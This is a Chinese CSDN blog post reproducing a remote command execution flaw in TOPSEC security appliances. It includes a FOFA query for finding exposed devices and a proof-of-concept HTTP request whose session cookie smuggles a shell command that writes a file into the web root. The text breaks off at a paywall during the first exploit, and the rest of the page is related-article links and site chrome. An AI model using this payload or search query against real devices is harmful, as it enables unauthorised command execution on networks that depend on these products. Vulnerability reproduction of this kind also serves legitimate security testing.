漏洞复现--天融信TOPSEC两处远程命令执行

最新推荐文章于 2024-07-01 17:16:16 发布
最新推荐文章于 2024-07-01 17:16:16 发布
阅读量475 收藏 7
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wintercc1219/article/details/136028029
版权
本文详细介绍了天融信TOPSEC的两个远程命令执行漏洞,包括漏洞描述、影响版本、网络空间测绘查询以及复现步骤。作者强调文章仅供经验分享,已对敏感信息进行处理,未经授权的利用将构成非法行为。
摘要由CSDN通过智能技术生成

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

天融信(TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。

二:漏洞影响版本

天融信TOPSEC

三:网络空间测绘查询

fofa:

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

image.png

四:漏洞复现1

image.png

POC1:

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1
Host: X.X.X.X
Cookie: session_id_443=1|echo 'vulnerability!' > /www/htdocs/sit
最低0.47元/天 解锁文章
wintercc1219
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞】天TOPSEC-static-convert-远程命令执行
知黑而守白
01-04 192
攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修漏洞,确保系统安全性。天TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本于最新状态。厂商通常会发布包含安全修的更新,及时应用这些更新以确保系统的安全性。
TOPSEC Cookie 远程命令执行漏洞
m0_71285176的博客
01-10 539
TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。命令:nuclei.exe -t 选择脚本 -u 扫描地址。
TOPSEC安全管理系统存在远程命令执行漏洞
heike_Ch的博客
05-18 249
TopSec安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同置流程,实客户等保合规、资产统一管理、风险一键阻断等。安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
TOPSEC Cookie 远程命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 1019
TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 存在RCE漏洞,会导致服务器失陷。
解决方案-天防火墙mgmt-新手漏洞教程
最新发布
2401_84915584的博客
07-01 239
提供天防火墙配置指南文档免费下载,摘要:天防火墙配置指南一、对象与规则在大多防火墙都采用了面向对象的设计。针对对象的行为进行的快速识别理,就是规则。
漏洞-天TOPSEC static_convert 远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 638
漏洞-天TOPSEC static_convert 远程命令执行漏洞,附带自己写的poc脚本
-息安全产品认证证书
04-29
-息安全产品认证证书
加密机SJJ1546系列-技术白皮书.pdf
11-09
加密机SJJ1546系列-技术白皮书,用户操作、安全加密、设备的操作说明、系统配置操作说明。提供给用户详尽的说明和操作案例。并供大家分项使用。
用户手册-天主机监控与审计系统_v3.1.docx
12-13
以上资源为息安全厂商:天的主机监控与审计系统用户手册,该手册目前为内部交流或提供客户使用的。该文档(用户手册-天主机监控与审计系统_v3.1.docx)是目前最新的用户手册。
网络数据防泄漏系统(TopDLP-N)技术白皮书v4.1.doc
12-31
随着企业息化的发展,息系统越来越多的使用于日常工作中,成为不可或缺的工具和手段。通过企业息化大大提高了企业生产效率,从 ERP 到SOA,成熟的企业已经越来越依赖于息系统而运行发展并壮大;虚拟化、云计算等技术的发展更是为许多跨地区、跨国家的企业节约了大笔的专线费用,并且提供了息传送的实时性、可靠性、保密性的保证。
多家防火墙设备存在息泄露漏洞
weixin_50464560的博客
06-18 1864
概述 漏洞名称 多家防火墙设备存在息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164-1.5.2 任子行下一代防火墙SURF-NGSA-V-3000 中科网威下一代防火墙F6600L-1.5.2 任子行网络安全审计系统内置报表 网域科技防火墙ACF-200-1.0.0 锐捷RG-ISG视频监控网关6000-ISG02C 天ACM-51538-V3.0.0176 无锡城安C
漏洞】某厂商TopSec maincgi.cgi远程命令执行漏洞
晚风不及你
03-01 524
TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。
【转载】漏洞--TOPSEC远程命令执行
maoxiaotao的博客
02-04 96
TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
下一代防火墙(NGFW)常用命令示例
weixin_42048685的博客
03-11 4449
define host add name oa服务器 ipaddr 192.168.1.1 #添加名称为“oa服务器”的主机对象,ip为192.168.1.1#define host add name oa服务器 ipaddr ‘192.168.1.1 192.168.1.2 192.168.1.3’ #添加名称为“oa服务器”的主机对象,ip为192.168.1.1、192.168.1.2以及192.168.1.3三个ip。
如何解决 Http 头 Hostname 攻击
dingd1234的博客
12-09 3508
打开 Nginx 的 conf 文件夹下的 default.conf 文件,在 server 中添加如下内容: server{ listen 端口号; server_name 域名或者IP地址; if($http_Host !~* '域名或IP地址'){ return 403; } } 然后保存
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值